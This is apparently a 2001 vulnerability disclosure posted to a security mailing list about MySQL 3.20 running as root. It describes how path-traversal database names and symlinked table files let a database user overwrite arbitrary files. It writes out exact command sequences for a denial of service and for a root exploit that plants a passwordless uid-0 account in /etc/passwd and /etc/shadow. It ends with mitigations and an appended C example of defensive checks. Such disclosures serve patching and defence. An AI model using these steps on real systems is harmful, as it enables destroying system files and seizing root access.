Date: Sun, 18 Mar 2001 21:32:37 +0300
From: "Pavlov, Lesha" <[email protected]>
To: [email protected]
Subject: potential vulnerability of mysqld running with root privileges (can be used as good DoS or r00t exploit)

Anybody who gets a login and password to mysql can use it as a DoS or r00t
exploit, because mysql accepts '../blah-blah' as a valid database name and
each table is represented by 3 files: tablename.ISD, tablename.ISM and
tablename.frm. But when mysqld checks whether a table already exists or
not, it checks _only_ tablename.frm:

Using this "vulnerable feature of mysql" to make a big DoS (will
overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/overwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$

The file /some/file/you/wish/to/overwrite will be overwritten.

Use as a r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
You getta r00t now!

Recommendations:
* Patch mysql so that, when it checks whether a table is present, it checks
all tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names starting with '..' as incorrect
database names.
* And the main recommendation - do not run mysqld as root!!!

Patches:
not yet

Workaround:
chown the existing database tables to a normal user and run mysqld as this
unprivileged user - it will be a better solution!

Vulnerable versions:
This DoS/exploit was tested on mysql-3.20.32a, but I see other versions of
mysql are also vulnerable.

Comments:
The mysql dox recommend not running mysqld as root, but the people from RedHat
didn't read the mysql dox - mysql installed from rpm is vulnerable.
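
Added example (not part of the original message and not MySQL source code): the two patch recommendations above expressed as C checks. The function names, the 64-character limit and the allow-list (stricter than only rejecting names that start with '..') are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

static const char *const TABLE_EXT[] = { ".frm", ".ISD", ".ISM" };

/* Assumed allow-list: letters, digits, '_'. No '.' or '/', so "../../tmp" fails. */
int name_is_safe(const char *name)
{
    size_t len = strlen(name);
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)name[i]) && name[i] != '_')
            return 0;
    return len > 0 && len <= 64;
}

/* A table exists if ANY of its three files does; lstat() also sees symlinks. */
int table_exists(const char *dbdir, const char *table)
{
    char path[4096];
    struct stat st;
    for (size_t i = 0; i < 3; i++) {
        snprintf(path, sizeof path, "%s/%s%s", dbdir, table, TABLE_EXT[i]);
        if (lstat(path, &st) == 0)
            return 1;
    }
    return 0;
}

/* O_EXCL: open() fails if the path exists, even as a symlink; nothing is truncated. */
int create_table(const char *dbdir, const char *table)
{
    char path[4096];
    if (!name_is_safe(table) || table_exists(dbdir, table))
        return -1;
    for (size_t i = 0; i < 3; i++) {
        snprintf(path, sizeof path, "%s/%s%s", dbdir, table, TABLE_EXT[i]);
        int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
        if (fd < 0 || close(fd) != 0)
            return -1;
    }
    return 0;
}

int main(void) { return name_is_safe("../../tmp"); } /* exit status 0: rejected */
```

The same name check would be applied to the database name before it is joined to the data directory path; running the server as an unprivileged user remains the main safeguard named in the message.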